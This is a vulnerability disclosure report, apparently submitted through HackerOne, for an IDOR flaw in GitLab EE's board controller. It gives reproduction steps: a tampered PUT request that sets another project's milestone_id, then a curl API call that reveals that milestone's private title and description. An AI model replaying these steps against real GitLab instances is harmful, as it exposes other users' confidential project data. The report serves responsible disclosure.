Board milestone assignment in GitLab EE exposes all milestone titles and descriptions

An insecure indirect object reference (IDOR) vulnerability was reported by Jobert via HackerOne. Details as follows:

There's an IDOR vulnerability in the Projects::BoardsController that allows a user to assign their board to any milestone on the GitLab instance. By then fetching the board object through the API, the milestone title, description, due date, state, and project ID is revealed. To reproduce, start of my creating an account on a GitLab EE instance. Create a project and go to the board. Click the "Edit board" button and intercept your network traffic. When you click on the "Save changes" button, observe the following request being submitted:

Request

PUT /root/test/boards/1.json HTTP/1.1
Host: gitlab-instance
...

{
  "board": {
    "id": 1,
    "name": "Development",
    "labels": [

    ],
    "milestone_id": -1,
    "assignee_id": 2,
    "weight": null,
    "label_ids": [
      ""
    ]
  }
}

In this request, use any milestone_id of any other project. Then, create a personal API token for your own account and request the board through the API to expose the milestone information:

Command

$ curl -vv -H 'private-token: AAA' http://gitlab-instance/api/v4/projects/1/boards | jq

Response

[
  {
    "id": 1,
    "name": "Development",
    ...
    "milestone": {
      "id": 1,
      "iid": 2,
      "project_id": 2,
      "title": "Private milestone",
      "description": "Secret description",
      "state": "active",
      "created_at": "0000-00-00T09:19:48.843Z",
      "updated_at": "0000-00-00T09:19:48.843Z",
      "due_date": null,
      "start_date": null
    },
    ...
]

This vulnerability is tested on the latest version and can only exploited on GitLab EE.

Impact

The milestones may contain confidential information that may be interesting to attackers.